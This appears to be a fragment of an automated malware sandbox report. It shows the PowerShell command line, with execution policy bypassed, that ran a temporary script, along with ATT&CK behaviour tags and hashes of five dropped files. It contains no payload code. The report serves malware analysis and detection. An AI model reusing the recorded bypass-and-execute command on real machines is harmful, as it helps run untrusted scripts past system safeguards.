C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 652
Network
MITRE ATT&CK Enterprise v15
Downloads

  Filesize:  2KB
  MD5:       6cf293cb4d80be23433eecf74ddb5503
  SHA1:      24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256:    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512:    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

  Filesize:  948B
  MD5:       721991167161c45d61b03e4dbad4984b
  SHA1:      fd3fa85d142b5e8d4906d3e5bfe10c5347958457
  SHA256:    0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb
  SHA512:    f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

  Filesize:  60B
  MD5:       d17fe0a3f47be24a6453e9ef58c94641
  SHA1:      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256:    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512:    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  Filesize:  2B
  MD5:       f3b25701fe362ec84616a93a45ce9998
  SHA1:      d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256:    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512:    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

  Filesize:  872B
  MD5:       be76535391d1ca935bb0aa17049a88fe
  SHA1:      628a2d3a643ef99890e8b13423b18f15e24a688e
  SHA256:    2a4335b5e2fc635eaafbe1bca590bf1039aa4d451972158e255ce8f51c43b388
  SHA512:    1ff39080dc566906af9d10fe66219a85811117879bde09e250e124b98cf88582a8dd1cd2d5297e6a431c251091d436d0f9473ff62dd8cbbe80e02e0b1dd822ce